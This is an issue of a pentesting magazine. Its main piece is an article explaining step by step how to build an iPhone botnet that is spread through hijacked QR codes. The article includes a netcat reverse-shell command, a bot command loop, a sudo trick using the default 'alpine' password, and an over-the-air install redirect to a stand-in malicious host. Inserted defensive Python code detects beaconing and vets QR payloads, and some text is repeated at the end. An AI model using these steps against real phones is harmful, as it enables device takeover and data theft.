Editor's note
EDITOR’S NOTE<br />
Starter Kit 02/2011 (02)<br />
Mobile Pentesting<br />
The December issue of Pentest Starterkit magazine is devoted primarily<br />
to mobile pentesting. The first three articles develop this subject. The first<br />
article, written by Nir Valtman, shows how a hacker can get into your<br />
iPhone. It explains what a QR code is, where it is used and the types of QR abuse.<br />
The author explains step by step how to break into an iPhone by QR. The second article,<br />
by Martyn Ruks, touches on the subject of mobile pentesting. It focuses especially<br />
on Google Android, Apple iOS, Microsoft Phone 7 and RIM BlackBerry OS, and<br />
specifies methods of testing these platforms. The third article, by Prof. Steven Furnell,<br />
discusses authentication safeguards in mobiles. It presents new<br />
possibilities and solutions other than the PIN code, which does not seem to<br />
protect the privacy of your mobile as well as most people think.<br />
The second part of this issue is about social fraud. Dinesh Sheety in his article<br />
shows social engineering from a different side. He describes the human<br />
reasons for using hackers’ tools. The second article in this section, by<br />
Gabriel Marcos, explains that a company’s IT security solutions do not<br />
need great knowledge and money, just awareness of some dangers.<br />
Everybody should know the simple and obvious things which help to keep<br />
your computer safe.<br />
The last part of this issue is about solutions which you can use to protect your<br />
PC. Bart Hopper in his article introduces one of the risk management<br />
tools, the NIST Risk Management Framework. It guides you in building a good<br />
protection system step by step, starting from defining company goals and<br />
finishing with creating a proper assessment plan. The last article, by Thejendra,<br />
introduces basic hacking tools and the most popular targets of attack.<br />
I hope the articles contained in this issue will open a new point of view for you<br />
and show you something new.<br />
Enjoy reading!<br />
Olga Głowala<br />
& Pentest team<br />
starterkit 02/2011(2) Page 3 http://pentestmag.com
CONTENTS<br />
Managing editor: Olga Głowala<br />
olga.glowala@software.com.pl<br />
starterkit 02/2011(2)<br />
TEAM<br />
Betatesters / Proofreaders: Massimo Buso, Ankit Prateek,<br />
Chris Cager, Rishi Narang, Johnatan Ringler, Iftach Ian Amit,<br />
Aby Rao<br />
Senior Consultant/Publisher: Paweł Marciniak<br />
CEO: Ewa Dudzic<br />
ewa.dudzic@software.com.pl<br />
Art Director: Ireneusz Pogroszewski<br />
ireneusz.pogroszewski@software.com.pl<br />
DTP: Ireneusz Pogroszewski<br />
Production Director: Andrzej Kuca<br />
andrzej.kuca@software.com.pl<br />
Marketing Director: Ewa Dudzic<br />
ewa.dudzic@software.com.pl<br />
Publisher: Software Media Sp. z o.o.<br />
ul. Bokserska 1, 02-682 Warszawa<br />
Phone: +48 22 427 36 56<br />
www.pentestmag.com<br />
Whilst every effort has been made to ensure the high quality of<br />
the magazine, the editors make no warranty, express or implied,<br />
concerning the results of content usage.<br />
All trade marks presented in the magazine were used only for<br />
informative purposes.<br />
All rights to trade marks presented in the magazine are<br />
reserved by the companies which own them.<br />
To create graphs and diagrams we used program<br />
by<br />
Mathematical formulas created by Design Science MathType<br />
DISCLAIMER!<br />
The techniques described in our articles may only<br />
be used in private, local networks. The editors<br />
hold no responsibility for misuse of the presented<br />
techniques or consequent data loss.<br />
MOBILE PENTESTING<br />
06<br />
QRbot – iPhone QR botnet<br />
by Nir Valtman<br />
This article is related to both social engineering and<br />
cyber-crime. Why social engineering? Since QR usage<br />
is based on interactive actions of mobile users, which<br />
might lead to threats on their devices, as will be explained<br />
in detail later. Why cyber-crime? The actions taken<br />
by criminals not only harm the mobile phone/device<br />
users, but also may steal sensitive information or aid<br />
in launching massive actions using controlled, Zombie-based<br />
networks (Botnets), e.g. DDoS – Distributed Denial<br />
of Service attacks. In order to explain the whole process,<br />
this article begins from the basics of QR and iPhone<br />
usage. After understanding the basics, we will dive into<br />
the actions needed to build a QRbot. Finally, avoidance<br />
recommendations will be explained.<br />
12<br />
Mobile Security Testing<br />
by Martyn Ruks<br />
This is a beginner’s level article, catering to the needs of<br />
professionals who wish to switch to or try their hand at<br />
Mobile Security Testing. It covers the 3 major platforms<br />
– Android, Windows and iOS. The text starts with<br />
background information on mobiles, tablets and the need<br />
for their security testing, and finally drills down to a “how-to”<br />
for the necessary fundamental steps as a heads-up.<br />
18<br />
Mounting a Mobile Masquerade?<br />
by Prof. Steven Furnell<br />
This article examines the forms of protection that are<br />
available to thwart an impostor at the authentication level.<br />
Although mobile devices have offered authentication<br />
safeguards for many years, it is fair to say that many<br />
users have managed to ignore them. The reason here is<br />
often that they overlook the value and sensitivity of what<br />
they’re carrying around in data terms, and so similarly<br />
overlook the need to protect it. While<br />
the situation has improved with<br />
smartphones, there are still<br />
plenty of users whose security<br />
practices haven’t caught up with<br />
their technology usage. Indeed,<br />
if you ask an audience how<br />
many of them don’t use a<br />
PIN (or similar) to protect<br />
their mobile handset, a good<br />
number of hands normally<br />
go up.<br />
SOCIAL FRAUD<br />
24<br />
Social Engineering<br />
by Dinesh Sheety<br />
The idea of this article is simple and nice. Though there are<br />
plenty of good resources and books on social engineering<br />
(Mitnick’s Art of Deception!), this is an “informative” kind<br />
of article; it lacks real examples, for instance a real<br />
example of an attack, such as describing how a pentest<br />
on an organization was done (without disclosing<br />
sensitive information). The author has provided a good solid<br />
base for someone who doesn’t have any clue about social<br />
engineering, and by the end of the article they will have a<br />
decent amount of knowledge to go out and build upon.<br />
30<br />
When Computer Attacks<br />
by Gabriel Marcos<br />
There is a new type of cyber threat that is catching<br />
more victims every day; many people know it is called<br />
Advanced Persistent Threats, and there is a trail of<br />
high-profile victims out there to give us enough evidence. But before<br />
taking any action we have to bring awareness to what this<br />
new kind of threat means: the only way to be protected<br />
is understanding what this means for organizations<br />
and how it could impact their business. Undoubtedly,<br />
exceptional circumstances call for exceptional actions.<br />
So, maybe it is time to acknowledge that computer<br />
attacks do not always happen to others; we need to<br />
become aware and be prepared in advance to minimize<br />
risk exposure to this kind of attack, protecting both our<br />
organizations and their leaders.<br />
SOLUTIONS<br />
36<br />
An Introduction to the NIST Risk<br />
Management Framework<br />
by Bart Hopper<br />
This article will introduce the NIST Risk Management<br />
Framework. It will cover the steps of system<br />
categorization, the selection of security controls, the<br />
implementation of the selected controls, the assessment<br />
of control implementation, and the system authorization<br />
process. Creating an effective information security<br />
program can be a daunting task. If you are lucky, you<br />
work for a company with an existing security program,<br />
clearly defined security mandates, and support from<br />
senior management. But, what do you do if you are<br />
given the task of creating a security program for your<br />
organization? This article will guide you through the<br />
process of creating an effective security program using<br />
the NIST risk management framework. Even if you are not<br />
directly responsible for creating a security program, you<br />
may find it helpful to understand how security programs<br />
are created and why certain items are prioritized by<br />
auditors.<br />
40<br />
Why is Cyber Security Important?<br />
by Thejendra<br />
Until a decade ago if you had to rob a bank it was<br />
necessary to indulge in an armed invasion, take hostages,<br />
spill blood, use getaway cars, etc., along with all the<br />
associated risks of botching up the operation. Or you had<br />
to indulge in excellent forgery and duplicate paperwork to<br />
siphon off funds. But today it is not necessary for you to<br />
even visit a bank to loot it without raising any alarms for<br />
weeks. So how is it now easy for criminals to loot a bank?<br />
The simple answer is the Internet. Today, many aspects<br />
of our life like banking, purchases, communications,<br />
etc., and even the militaries depend on the internet and<br />
worldwide connectivity. While the internet offers several<br />
conveniences, it can also ruin your life in an instant<br />
with threats like identity thefts, online scams and other<br />
threats.<br />
QRbot – iPhone QR botnet<br />
Every time that new technology is revealed, lots of security<br />
researchers seek vulnerabilities in it. In my case, I am looking<br />
for security holes in the integration between QR readers and smart<br />
phones, especially on iPhone.<br />
This article is related to both social engineering<br />
and cyber-crime. Why social engineering?<br />
Since QR usage is based on interactive actions<br />
of mobile users, which might lead to threats on their<br />
devices, as will be explained in detail later.<br />
Why cyber-crime? The actions taken by criminals not<br />
only harm the mobile phone/device users, but also may<br />
steal sensitive information or aid in launching massive<br />
actions using controlled, Zombie-based networks<br />
(Botnets), e.g. DDoS – Distributed Denial of Service<br />
attacks.<br />
In order to explain the whole process, this article<br />
begins from the basics of QR and iPhone usage.<br />
After understanding the basics, we will dive into the<br />
actions needed to build a QRbot. Finally, avoidance<br />
recommendations will be explained.<br />
What is QR?<br />
A QR (Quick Response) code is a type of matrix<br />
barcode that was developed to automate industrial<br />
processes. The code consists of black modules arranged<br />
in a square pattern on a white background, e.g. the QR<br />
code in Figure 1 is decoded to the phrase Do you think<br />
that information security is expensive? Try to ignore it!<br />
There are codes similar to the QR, such as EZcode and QM,<br />
but the QR is the most common.<br />
The QR is used in various places and media types:<br />
newspapers, TV, business cards, books, Google<br />
favorite places (i.e. to see reviews of a restaurant before<br />
entering), Google Chrome add-ons, museums, house<br />
selling advertisements, on CDs to watch a clip of the<br />
band, troubleshooting on electronic devices, restaurant<br />
menus etc.<br />
In order to read the QR code, the mobile device (not<br />
only smart phones) should include specialized code<br />
reading and decoding software. The mobile device can<br />
translate the decoded content into different actions, e.g. open a URL, send an<br />
SMS, make a call, add a contact, show text etc.<br />
However, there are QR codes that cannot be read by<br />
mobile devices because they are encrypted. A matching<br />
decryption key is required to view the content.<br />
QR abuse<br />
The main problem of the QR is that the human eye<br />
cannot decode the message. This makes the following<br />
social attacks possible:<br />
Figure 1. Demo text<br />
QRjacking<br />
A malicious sticker can be pasted over the original<br />
sticker, e.g. on a public advertisement in the street or<br />
in other public spaces, or the code is simply replaced where possible<br />
– websites, brochures etc.<br />
Scanjacking<br />
The scanned barcode redirects to a malicious web<br />
site or runs malicious code. Hence, various attacks<br />
can be executed, e.g. phishing, man-in-the-browser<br />
(a form of man-in-the-middle attack), SMS abuse (social<br />
engineering is required) etc.<br />
iPhone users and application permissions<br />
iPhone devices can be divided into two main categories<br />
– legal (factory default configuration) and jailbroken<br />
(running a hacked, modified operating system version).<br />
On one hand, legal iPhone devices can execute only<br />
Apple-approved applications, which may lower the total<br />
risk of getting malicious software on the device. On the<br />
other hand, jailbroken devices are more vulnerable<br />
to malicious applications since these devices allow<br />
installation of applications which have not been checked<br />
and verified by Apple.<br />
There are several options to install applications on<br />
iPhones: App Store, iTunes, iPhone Configuration<br />
Utility and over-the-air (from a web server). Of course,<br />
Cydia and Installous are also available on jailbroken<br />
devices.<br />
One thing is certain about both the legal and most of<br />
the jailbroken devices – they have a default password<br />
for the root user; by default it is alpine (without the<br />
quotes, of course).<br />
Why is this interesting? By default, applications<br />
don’t have root access to the iPhone but instead are<br />
given limited access as the user mobile (for<br />
which the default password is dottie). In order to get root<br />
privilege access, we need to do some coding, as will be<br />
explained later in this article.<br />
QR botnet<br />
After understanding QR threats and iPhone limitations, I<br />
can explain the idea behind the title of this article.<br />
In order to build a botnet we need to combine<br />
the threats of the QR code readers with the iPhone<br />
limitations.<br />
The main idea of this attack is to install a malicious<br />
application from a web server directly on the iPhone. It<br />
almost does not matter whether the iPhone is legal or<br />
jailbroken with the default root password.<br />
Step 1: Locate vulnerable QR reader<br />
Since we would like to install an application from a web<br />
site, the QR reader should have automatic redirection to<br />
the URL. I have been testing the following 10 applications<br />
on my iPhone with iOS 5: QRReader, RedLaser,<br />
QR+, ShopSavvy, Scan, ConnectMe, HP CodeScan,<br />
ATTScanner, ScanLife and i-Nigma. To make it close<br />
to reality, I searched for the word QR in the App Store and<br />
downloaded the first 10.<br />
I generated a QR code for a website and scanned<br />
the code in each application. The following applications<br />
have automatic redirection: QRReader, ShopSavvy,<br />
Scan, HP CodeScan, ScanLife and i-Nigma. Summary:<br />
6 of 10 were vulnerable to automatic redirection, e.g.<br />
i-Nigma opens Safari automatically and redirects to the<br />
requested page, see the screenshot in Figure 2.<br />
What should appear when automatic redirection is<br />
disabled? See the screenshot of RedLaser’s question in<br />
Figure 3.<br />
Figure 2. Automatic redirection in Safari<br />
Figure 3. Popup on non-redirecting QR reader<br />
Step 2: Run botnet operator<br />
The concept of this botnet is based on a client-server<br />
application. The server runs Netcat (a built-in program on<br />
Linux and Mac), which listens for incoming connections.<br />
The following command should be running on the<br />
server:<br />
nc -k -l 3333<br />
Explanation: Netcat listens on port 3333 and, because of -k, waits<br />
for another connection after its current connection is<br />
completed.<br />
Step 3a: Build bot<br />
The development of iPhone applications is performed<br />
in Xcode (I use version 4.2 on Lion), which can be<br />
downloaded and installed for free from Apple’s web site.<br />
In addition, in order to be able to sign the application, a<br />
developer account is needed – it costs some money.<br />
There are ways to bypass signing, but I would rather not<br />
discuss them in this article.<br />
Our bot is based on a reverse backdoor shell attack,<br />
which is implemented using netcat. A reverse<br />
backdoor shell is a scenario in which a remote device (i.e.<br />
the iPhone) connects to a server (i.e. the botnet operator) and<br />
then executes local system commands on the device.<br />
In order to execute the attack, the following command<br />
should be run: nc [operator’s_ip] 3333 -e /bin/bash.<br />
However, by default Mac devices don’t support the -e or<br />
-c options. I was testing various versions of netcat<br />
and tried to compile it for different operating systems;<br />
none of them worked in execution mode. Some of you<br />
might think that Mac OS/iOS is only a variant<br />
of FreeBSD; however, the bottom line is that it won’t<br />
work for me. I decided to build my own execution mode,<br />
which is based on system calls. See the code below<br />
to understand the concept (not the complete source<br />
code):<br />
system("echo 'Started QRbot on iPhone by NirV ' > ~/result");<br />
while (1) {<br />
    system("cat ~/result | nc [operator_ip] 3333");<br />
    system("nc [operator_ip] 3333 | head -n 1 | awk '{system($0)}' > ~/result");<br />
}<br />
Note: not all system calls are supported on legal<br />
devices, therefore the developer of the bot should<br />
consider implementing the system commands in<br />
Objective C, e.g. connect to the bot operator using a socket and<br />
listen for commands.<br />
Description: The 1st system call writes a banner to<br />
a file. The banner can include a general message or<br />
include some details about the iPhone, e.g. IP (usually<br />
behind a NAT), system version etc. The next commands<br />
run in an endless loop (while true): cat is a command to<br />
print the content of a file; in this case, cat prints the<br />
content of the banner or any content in the ~/result<br />
file. The 2nd system command combines printing<br />
the content as explained and passing it as input to the<br />
netcat application, which sends the message to the bot<br />
operator. Since the operator should have control, the<br />
3rd command opens a netcat and stores the output of<br />
the 1st row (the command from the operator), and then<br />
the command is passed as STDIN to the awk command,<br />
which runs the command on the operating system.<br />
Note: even if awk is not installed on the iPhone, the<br />
output can be written to a bash file and then executed.<br />
The 2nd command above is then executed again to print the<br />
output of the system to the botnet operator.<br />
What are the limitations of the code above? My test is<br />
based mainly on the iPhone emulator; however, the code<br />
might need changing since applications on a legal iPhone<br />
run in a sandbox with limited permissions. On a physical<br />
iPhone the bot runs under the mobile user (not root),<br />
which means that its current functionality can produce<br />
only DDoS attacks. The good thing about this is that it<br />
does not matter if the iPhone is jailbroken or not.<br />
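The loop in Step 3a gives the bot a footprint a network defender can look for: on every pass the device opens a fresh connection to the operator’s host and port, so the perimeter sees one short connection after another from each infected phone, all converging on the same host:port. The Python script below is an added example, not code from the article or its author; it scores that pattern over constructed firewall-style log lines. The log format, the addresses (documentation and private ranges), the five-connection minimum and the 25% jitter threshold are all assumptions made for the example.

```python
"""Spot QRbot-style beaconing in outbound connection logs.

Added example (not code from the article).  The bot loop in Step 3a
opens a fresh TCP connection to the operator's host:port on every pass,
at the steady rhythm of the loop.  On the wire that is a beacon: many
connections from one device to one host:port with low timing jitter,
and several devices converging on the same host:port.  The log format,
the addresses and the thresholds below are constructed for the example.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed firewall-style log: "<ISO time> <src> -> <dst>:<port> <proto>".
# 10.0.0.21 and 10.0.0.34 beacon to the operator on 3333; 10.0.0.50 is normal browsing.
SAMPLE_LOG = """\
2011-12-01T10:00:00 10.0.0.21 -> 203.0.113.9:3333 tcp
2011-12-01T10:00:01 10.0.0.34 -> 203.0.113.9:3333 tcp
2011-12-01T10:00:00 10.0.0.50 -> 198.51.100.7:443 tcp
2011-12-01T10:00:02 10.0.0.21 -> 203.0.113.9:3333 tcp
2011-12-01T10:00:03 10.0.0.34 -> 203.0.113.9:3333 tcp
2011-12-01T10:00:04 10.0.0.21 -> 203.0.113.9:3333 tcp
2011-12-01T10:00:05 10.0.0.34 -> 203.0.113.9:3333 tcp
2011-12-01T10:00:06 10.0.0.21 -> 203.0.113.9:3333 tcp
2011-12-01T10:00:08 10.0.0.34 -> 203.0.113.9:3333 tcp
2011-12-01T10:00:08 10.0.0.21 -> 203.0.113.9:3333 tcp
2011-12-01T10:00:10 10.0.0.34 -> 203.0.113.9:3333 tcp
2011-12-01T10:00:10 10.0.0.21 -> 203.0.113.9:3333 tcp
2011-12-01T10:00:12 10.0.0.34 -> 203.0.113.9:3333 tcp
2011-12-01T10:03:17 10.0.0.50 -> 198.51.100.7:443 tcp
2011-12-01T10:04:02 10.0.0.50 -> 198.51.100.8:443 tcp
2011-12-01T10:09:48 10.0.0.50 -> 198.51.100.7:443 tcp
2011-12-01T10:15:30 10.0.0.50 -> 198.51.100.7:443 tcp
2011-12-01T10:16:02 10.0.0.50 -> 198.51.100.7:443 tcp
"""


def parse_connections(log):
    """Group connection timestamps by (src, dst, dst_port)."""
    flows = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, _arrow, dst_port, _proto = line.split()
        dst, port = dst_port.rsplit(":", 1)
        flows[(src, dst, int(port))].append(datetime.fromisoformat(ts))
    return flows


def beacon_score(times, min_connections=5, max_jitter=0.25):
    """Return (mean interval in s, jitter) when the timestamps look like a beacon, else None.

    Jitter is the coefficient of variation of the gaps between connections:
    a loop with a constant-size exchange gives a value near 0, while a human
    revisiting the same site gives gaps that vary wildly.
    """
    if len(times) < min_connections:
        return None
    times = sorted(times)
    gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
    interval = mean(gaps)
    if interval <= 0:
        return None
    jitter = pstdev(gaps) / interval
    return (interval, jitter) if jitter <= max_jitter else None


def find_beacons(log, **thresholds):
    """Return one record per (src, dst, port) flow that beacons."""
    hits = []
    for (src, dst, port), times in parse_connections(log).items():
        score = beacon_score(times, **thresholds)
        if score is not None:
            hits.append({"src": src, "dst": dst, "port": port,
                         "connections": len(times),
                         "interval": score[0], "jitter": score[1]})
    return hits


def operator_candidates(hits, min_sources=2):
    """Group beaconing sources by destination: several devices beaconing to the
    same host:port is the fan-in that separates a botnet operator from one
    device polling one service."""
    by_dst = defaultdict(set)
    for hit in hits:
        by_dst[(hit["dst"], hit["port"])].add(hit["src"])
    return {dst: sorted(srcs) for dst, srcs in by_dst.items() if len(srcs) >= min_sources}


if __name__ == "__main__":
    beacons = find_beacons(SAMPLE_LOG)
    for b in beacons:
        print(f"{b['src']} -> {b['dst']}:{b['port']}  {b['connections']} connections, "
              f"every {b['interval']:.1f}s, jitter {b['jitter']:.2f}")
    for (dst, port), srcs in operator_candidates(beacons).items():
        print(f"possible operator {dst}:{port} controlling {len(srcs)} devices: {', '.join(srcs)}")
```

Run directly, it reports the two beaconing phones and flags 203.0.113.9:3333 as the shared destination; the browsing host is left alone because its gaps vary too much. In practice the input is the connection log of the perimeter firewall or NAT gateway. A bot that sleeps a random time between passes raises the coefficient of variation, which is why max_jitter is a parameter and why the fan-in check is kept separate from the per-device timing check.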
If we had root access, what could the QRbot do?<br />
Collect personal data, e.g. contact lists, emails, last<br />
visited GPS locations; run as malware even after<br />
uninstalling the application by adding tasks to the<br />
crontab (scheduled tasks); steal the cache and generally<br />
back up the iPhone. Is it hard to get root access? The<br />
sudo command is not implemented by default on iOS,<br />
but the su command is. The limitation of su is that by<br />
running the command, a different shell is started, which<br />
means that in this case, running the command as a script<br />
or as a system command is almost impossible. In order<br />
to get root in an easier way, the password should remain<br />
alpine and one of the following should be installed on<br />
the iPhone device: OpenSSH or sudo. It is important to<br />
mention that most jailbroken iPhones have at least<br />
one of them, or these can be installed as part of QRbot.<br />
In this case, the attack vector is larger since there are<br />
fewer actions that must be accomplished in order to<br />
get root access. To make a long story short, if sudo<br />
is installed then the commands above can run with the<br />
following command:<br />
echo '[password]' | sudo -S [command]<br />
If OpenSSH is installed, then a reverse ssh tunnel is<br />
probably a good solution – Google it.<br />
In conclusion, the functionality of the QR botnet<br />
depends on whether the iPhone is legal or jailbroken, and<br />
if it is jailbroken, the installed applications should be<br />
abused.<br />
Figure 4. Botnet operator screen on application load<br />
Step 3b: Verify bot operation<br />
After coding the logic into the application, some<br />
testing should be done in order to verify that the bot<br />
is operating as we expected. In order to do the tests,<br />
run the server as explained in step 2 and run the<br />
application using Xcode. It is recommended to run it<br />
first on the iPhone Simulator. The first state of the botnet<br />
operator should not contain any content; however,<br />
after running the application, the terminal of the botnet<br />
operator should look like Figure 4, which means that the<br />
iPhone is connected.<br />
Since the iPhone is connected and waiting for<br />
commands, the botnet operator should write an iOS<br />
system call, e.g. ping -c 4 www.google.com, where -c 4<br />
means that only four requests are sent. A malicious bot<br />
would run an endless loop. The results should be<br />
similar to the screenshot in Figure 5.<br />
The next step is to build an IPA file and test it on<br />
the iPhone. If you have a developer account, then<br />
you should know how to do this. If you don’t have a<br />
developer account, please Google it. Note that some<br />
of the commands illustrated earlier might not work<br />
on the real iPhone, therefore you need to code the<br />
features, e.g. file system access, sockets etc.<br />
Step 4: Publish QRbot on the web<br />
By this step we have found a vulnerable QR reader and<br />
created a bot and botnet operator. In order to install the<br />
bot, we need to use a legitimate distribution method. In<br />
this case, we post the bot on an Internet-published IIS<br />
web server; this installation type is also known as over-the-air<br />
(OTA) installation. Additional requirements: a<br />
static IP address and a DNS name (more reliable), an<br />
XML manifest file (view the configuration tasks on Apple’s<br />
web site) and a developer account as a single person<br />
or enterprise. The difference between single person and<br />
enterprise is the amount of bots per server, meaning<br />
that the enterprise account supplies an unlimited number<br />
of endpoints (iPhone/iPad). Since the deployment<br />
method is explained in detail in the iOS Developer Library<br />
(Apple’s web site), the explanation of this step includes<br />
only the important details to make the distribution<br />
work as part of the cyber attack. To accomplish the<br />
attack, create the following HTML page and name it<br />
default.html: Listing 1.<br />
Figure 5. Control botnet remotely<br />
Listing 1. QRjacking (default.html; only the page title and the script body are reproduced)<br />
QRbot<br />
// Replace MALSITE.com with your site<br />
window.location="itms-services://?action=download-manifest&url=http://MALSITE.com/manifest.plist";<br />
Another option is to run the script in a hidden IFRAME<br />
or on a blog, as there are many blogging platforms<br />
available on the internet, most of which support and<br />
provide easy means to set a blog up and running in a<br />
matter of minutes.<br />
Note that the installation is based on the ITMS (aka iTunes<br />
Music Store) protocol. Safari will use the link above in<br />
order to install the application. It is important to mention<br />
that the installation requires the user’s approval, which will<br />
be discussed in the next step.<br />
Step 5: QRjacking & Scanjacking<br />
As explained before, social engineering is required in<br />
order to implement the attack. The first action should<br />
be QRjacking, which means that the legal QR should<br />
be replaced with the malicious QR. However, it might be<br />
more comfortable to go further and publish a cool<br />
advertisement on TV. In order to QRjack, generate a<br />
QR code (I use http://qrcode.kaywa.com/) and then<br />
print it; for instance, the QR code in Figure 6 generates a<br />
link to http://en.citadel.co.il/.<br />
Figure 6. Citadel consulting web site<br />
In reality, the link above should be redirected to<br />
the HTML page from step 4. By entering the page, an<br />
installation screen should appear, as illustrated in<br />
Figure 7.<br />
Figure 7. Installation confirmation<br />
So the real question is how to trick people into using this<br />
code? The answer is in the question: they already did.<br />
People who scan the QR code are sure that the content<br />
is authentic, or at least do not suspect it as malicious.<br />
Avoidance<br />
As I explained at the beginning of the article, the QRbot<br />
attack is based on both social engineering and cyber-crime<br />
techniques. The actions that should be taken in<br />
order to avoid this kind of attack are as follows:<br />
No automatic redirection<br />
There are applications that do not redirect to web pages<br />
automatically. I recommend testing each QR reader that<br />
is downloaded to your iPhone. In order to perform the<br />
test you may use the QR code from this article (which<br />
may be QRjacked) or generate a QR code to a<br />
URL.<br />
Decode QR<br />
There are many QR decoders; I use<br />
http://zxing.org/w/decode.jspx to validate the data of the code. If you don’t<br />
know the web site to which you are being referred, it<br />
is recommended to avoid scanning the QR code from<br />
the iPhone.<br />
Control over-the-air (OTA) installation<br />
OTA installation should be used when a specific<br />
organization sends a link for installation. If the purpose<br />
of a QR code is software installation, Apple’s App Store<br />
should do it, unless it is discussed in advance with the<br />
publishing company.<br />
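The three avoidance measures above (no automatic redirection, decode the code before acting on it, control over-the-air installation) can be enforced inside the reader itself. The Python triage function below is an added example, not code from the article or from any QR reader; given the decoded text of a code it decides whether the reader may open it automatically, must show the destination to the user first, or must refuse. The trusted-host list, the approved OTA manifest host, the shortener list and the sample payloads are constructed for the example; the itms-services payload mirrors the link in Listing 1.

```python
"""Triage a decoded QR payload before the reader acts on it.

Added example (not code from the article or any QR reader).  A reader
that calls triage() and only auto-opens ALLOW results does not have the
"automatic redirection" weakness exploited above: anything else is shown
to the user first (PROMPT) or refused (BLOCK).  The host lists and the
sample payloads are constructed for this example.
"""
from dataclasses import dataclass, field
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

ALLOW, PROMPT, BLOCK = "ALLOW", "PROMPT", "BLOCK"

# Assumption: hosts the organisation trusts enough to open without a prompt.
TRUSTED_HOSTS = {"en.citadel.co.il", "pentestmag.com"}
# Assumption: the only host allowed to serve over-the-air (itms-services) manifests.
OTA_MANIFEST_HOSTS = {"mdm.example-corp.internal"}
# A few public shorteners; they hide the real destination from the user.
SHORTENERS = {"bit.ly", "goo.gl", "tinyurl.com", "t.co"}
# Schemes that execute or embed content instead of fetching a page.
DANGEROUS_SCHEMES = {"javascript", "data", "file", "vbscript"}


@dataclass
class Verdict:
    kind: str                 # what the payload would make the phone do
    action: str               # ALLOW, PROMPT or BLOCK
    reasons: list = field(default_factory=list)


def _is_ip_literal(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def _triage_web_url(parts):
    """http/https: block host spoofing, prompt on anything that hides the destination."""
    host = (parts.hostname or "").lower()
    block, prompt = [], []
    if parts.username is not None:          # "https://trusted.site@evil.example/"
        block.append("user-info before '@' disguises the real host " + host)
    if _is_ip_literal(host):
        prompt.append("raw IP address instead of a hostname")
    if host in SHORTENERS:
        prompt.append("URL shortener hides the final destination")
    if parts.scheme == "http":
        prompt.append("plain HTTP; the page can be altered in transit")
    if host not in TRUSTED_HOSTS:
        prompt.append("host not on the trusted list: " + host)
    if block:
        return Verdict("url", BLOCK, block + prompt)
    if prompt:
        return Verdict("url", PROMPT, prompt)
    return Verdict("url", ALLOW, [])


def triage(payload):
    """Classify the decoded text of a QR code and decide how a reader may act on it."""
    text = payload.strip()
    if text.upper().startswith(("BEGIN:VCARD", "MECARD:", "WIFI:")):
        return Verdict("contact-or-wifi", PROMPT, ["writes data to the device; confirm with the user"])
    parts = urlsplit(text)
    scheme = parts.scheme.lower()
    if scheme == "":
        return Verdict("text", ALLOW, [])  # nothing to act on, just display it
    if scheme in DANGEROUS_SCHEMES:
        return Verdict(scheme, BLOCK, ["scheme executes or embeds content"])
    if scheme == "itms-services":
        # Over-the-air install: the real target is the manifest in the url= parameter.
        manifest = parse_qs(parts.query).get("url", [""])[0]
        mparts = urlsplit(manifest)
        mhost = (mparts.hostname or "").lower()
        if mparts.scheme == "https" and mhost in OTA_MANIFEST_HOSTS:
            return Verdict("ota-install", PROMPT, ["OTA install from approved host " + mhost])
        return Verdict("ota-install", BLOCK,
                       ["over-the-air app install from unapproved host: " + (mhost or "<none>")])
    if scheme in ("sms", "tel", "mailto"):
        return Verdict(scheme, PROMPT, [scheme + " action must be confirmed by the user"])
    if scheme in ("http", "https"):
        return _triage_web_url(parts)
    return Verdict(scheme, PROMPT, ["unknown scheme"])


# Constructed sample payloads: the Figure 1 text, the Listing 1 OTA link and a few decoys.
SAMPLE_PAYLOADS = [
    "Do you think that information security is expensive? Try to ignore it!",
    "https://en.citadel.co.il/",
    "http://en.citadel.co.il/",
    "itms-services://?action=download-manifest&url=http://MALSITE.com/manifest.plist",
    "https://en.citadel.co.il@malsite.example/login",
    "https://bit.ly/abc",
    "sms:+15550100?body=hi",
]


def report(payloads=SAMPLE_PAYLOADS):
    """Return [(payload, action)] so a reader UI (or a test) can see the decision per code."""
    return [(p, triage(p).action) for p in payloads]


if __name__ == "__main__":
    for payload in SAMPLE_PAYLOADS:
        v = triage(payload)
        print(f"{v.action:6} {v.kind:15} {payload}")
        for reason in v.reasons:
            print("       -", reason)
```

The itms-services branch is the one that matters for the OTA recommendation: the scheme itself is legitimate, so the decision is made on the host that serves the manifest, and an unapproved host is refused rather than handed to Safari. Everything that merely looks odd (shortener, plain HTTP, unknown host) is left for the user to confirm, which is exactly the RedLaser-style prompt the article recommends over silent redirection.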
Conclusion<br />
QRbot is a concept of malicious software distribution<br />
and usage as a botnet. In this article we have seen<br />
that combining social engineering with cyber-crime<br />
might lead to DDoS attacks and confidential personal<br />
information leakage. The QR botnet is only a PoC;<br />
however, it might be used since the implementation of<br />
the attacks above is possible in a short time. In order to<br />
avoid the attacks, users should be more aware of the<br />
risks and of the solutions: using secure QR readers and<br />
verifying applications’ installation sources.<br />
NIR VALTMAN<br />
Nir Valtman is employed by Citadel Consulting<br />
LTD (http://en.citadel.co.il) as Chief Security<br />
Architect. Before this position he was<br />
working as a senior technology consultant,<br />
application security consultant, system<br />
security consultant and a technological<br />
trainer. As part of his positions, he was not only consulting,<br />
but also performed hands-on activities in various fields, e.g.<br />
hardening, penetration testing and development for personal/<br />
internal applications. Nir has a BSc in computer science<br />
but his knowledge is based mainly on cowboy learning and<br />
information sharing with the techno-oriented communities.<br />
As part of Nir’s position, he is responsible for investigating new<br />
technologies, delivering high-level technology surveys and<br />
business development in the company. Visit his blog:<br />
http://valtman-nir.blogspot.com or contact him: nirv@citadel.co.il.<br />
Page 10 http://pentestmag.com
Figure 6. Citadel consulting web site<br />
more comfortable to go further and publish a cool<br />
advertisement on TV. In order to QRjack, generate a<br />
QR code (I use http://qrcode.kaywa.com/) and then<br />
print it, for instance, the QR code in fig6 generates a<br />
link to http://en.citadel.co.il/.<br />
In reality, the link above should be redirected to<br />
the html page from step 4. By entering the page, an<br />
installation screen should appear, as illustrated in<br />
Figure 7.<br />
So the real question is how to trick people to use this<br />
code? The answer is in the question, they already did.<br />
People who scan the QR code are sure that the content<br />
is authentic, or at least do not suspect it as malicious.<br />
Avoidance<br />
As I explained in the beginning of the article, the QRbot<br />
attack is based on both social engineering and cybercrime<br />
techniques. The actions that should be taken in<br />
order to avoid this kind attack are as follows:<br />
